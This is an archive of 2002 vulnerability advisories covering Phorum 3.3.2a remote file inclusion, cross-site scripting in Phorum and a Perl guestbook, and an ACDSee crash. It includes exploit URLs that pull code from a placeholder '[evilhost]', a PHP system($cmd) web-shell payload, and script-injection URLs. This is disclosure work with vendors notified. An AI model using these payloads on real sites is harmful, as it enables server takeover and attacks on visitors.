Phorum 3.3.2a has another bug for remote command execution

2002-05-18 Thread Markus Arndt 

Target:
Phorum 3.3.2a (maybee older)

Description:
Phorum 3.3.2a let's remote users execute arbitary code

Found by:
Markus Arndt[EMAIL PROTECTED]

Vendor:
http://www.phorum.org

Notified Vendor:
Yes, already fixed in 3.3.2b

Details:


Another bug for remote command execution.
This time it's admin/actions/del.php
:)

Some code:
?php
require $include_path/delete_message.php;
delete_messages($id);
QueMessage(Message(s) $id and all children were deleted!br);
?

The url to exploit the script would be:
http://[vulnerablehost]/phorum/admin/actions/del.php?include_path=http://[evilhost]cmd=ls

That url will make the script include http://[evilhost]/delete_message.php


GoGoGo and secure your boxes. :)





One other thing before i forget:
CSS-Attacks are possible on 2 files..

http://[host]/phorum/admin/footer.php?GLOBALS[message]=scriptalert(css 
strikes!);/script
http://[host]/phorum/admin/header.php?GLOBALS[message]=scriptalert(css 
strikes!);/script


Markus Arndt[EMAIL PROTECTED]
http://skka.de

Keine verlorenen Lotto-Quittungen, keine vergessenen Gewinne mehr! 
Beim WEB.DE Lottoservice: http://tippen2.web.de/?x=13

Phorum 3.3.2a remote command execution

2002-05-17 Thread Markus Arndt 

Target:
Phorum 3.3.2a (prior versions?)

Description:
In Phorum 3.3.2a (a bulletin board) there's a security flaw that lets remote users
include external php scripts and execute arbitary code.

Found by:
Markus Arndt[EMAIL PROTECTED]

Vendor:
http://www.phorum.org

Notified Vendor:
Yes, already fixed version available

Details:

After extracting the Phorum 3.3.2a archive we have lots of php files and subfolders.
I just snooped around a bit and found this file vulnerable for remote script inclusion:

./plugin/replace/plugin.php

let's see some code:



?php
include($PHORUM[settings_dir]/replace.php);

function mod_replace_read_body ($body) {
  global $pluginreplace;
  reset($pluginreplace);
  while(list($key,$val) = each($pluginreplace)) {
$body = str_replace($key,$val,$body);
  }
  return $body;
}

$plugins[read_body][mod_replace]=mod_replace_read_body;

?


Easy one..

http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]cmd=ls

This one will get the file http://[evilhost]/replace.php and execute it.
If [evilhost] has php enabled we could use this one as replace.php:

?
echo(?
system(\\$cmd\);
?);
?

If it's not php-enabled simply:
?
system($cmd);
?




Markus Arndt[EMAIL PROTECTED]
http://skka.de

Keine verlorenen Lotto-Quittungen, keine vergessenen Gewinne mehr! 
Beim WEB.DE Lottoservice: http://tippen2.web.de/?x=13

Possible Buffer Overflow in ACDSee 4.0

2002-05-10 Thread Markus Arndt 

While playing around with ACDSee's Photo Albumfiles (ais extension) i noticed
a bug that seems to me like a buffer overflow.

ACDSee's ais are build up like this:


[absolutepath]\filename.gif description  
[absolutepath]\some.gif mydog
[absolutepath]\dunno.gif mycat


I filled one description up to 260 chars.
Then i loaded the file in ACDSee. Nothing special..

But when i wanted to see the picture's properties the app just crashed.
It seems that acdsee can't handle more than 256 chars in the description
when displaying the propertie's dialog(or maybee i'm just an idiot ;D).

Grab a sample Photoalbumfile at http://skka.de/acdsee_bug.zip;.
The included gif has to be placed directly on c:\ because acdsee only
allows absolute paths in these files and i couldn't give any relative
path to the gif.. :/
Otherwise the ais file will seem not to contain any pictures and you can't
trigger the bug by selecting the pic's properties in the context menu.

Maybee somebody finds out more..

Markus Arndt[EMAIL PROTECTED]

Keine verlorenen Lotto-Quittungen, keine vergessenen Gewinne mehr! 
Beim WEB.DE Lottoservice: http://tippen2.web.de/?x=13

Philip Chinery's Guestbook 1.1 fails to filter out js/html

2002-04-22 Thread Markus Arndt 

Target:
 Philip Chinery's Guestbook 1.1 (maybee older versions?)

Vendor:
 http://www.sector7g.de.vu

Notified Vendor:
 Sure

Affected Systems:
 Webservers that run Philip Chinery's Guestbook 1.1

Found by:
 Markus Arndt[EMAIL PROTECTED]

Short Description:
 Philip Chinery's Guestbook 1.1 fails to filter out JScript/HTML (CrossSiteScripting)

This nice lil' guestbook let's the owner choose to filter out Jscript- and/or 
HTML-entrys..
Let's see the start of it's sub where it saves an entry:

---code starts---

sub SaveData
{
if($kill_html == 1) {
$Text =~ s/([^]|\n)*//g;
}
   
if($kill_html == 2) {
$Text =~ s//lt;/g;
$Text =~ s//gt;/g;
}

if ($kill_java) {
$Text =~ s/!--(.|\n)*--//g;
}
$Text   =~ s/\n/nbsp;br/g;
$Text   =~ tr/|/ /;
$Text   =~ s/\t/nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;/g;
$Text   =~ s/\cM//g;

---code ends---

That's all it filters out.. As we can see it does only filter the comment itself a 
user wrote!
For example the fields Name, EMail or Homepage are NOT checked!


So let's build an url to exploit this..

http://[target]/cgi-bin/guestbook.pl?action=signcwrite=noneName=scriptalert(gotcha!);/script[EMAIL PROTECTED]Text=css%20example

This would post a message that would display an alertbox on a visiotrs screen
when accessing the gb..

As I noticed the guestbook logs ipadresses but doesn't prevent spam.
It also automaticly redirects posters back to the mainguestbook-page.
That makes it very easy to post entrys that e.g. force visitors to spam the guestbook 
(really anoying).


Sorry for bad english, hope you can understand what i'm talkin' about. ;)


Markus Arndt[EMAIL PROTECTED]
http://skka.de
__
100 MB und noch mehr gute Gründe! Jetzt anmelden und profitieren. Da ist mehr 
für Sie drin unter http://club.web.de/?mc=021103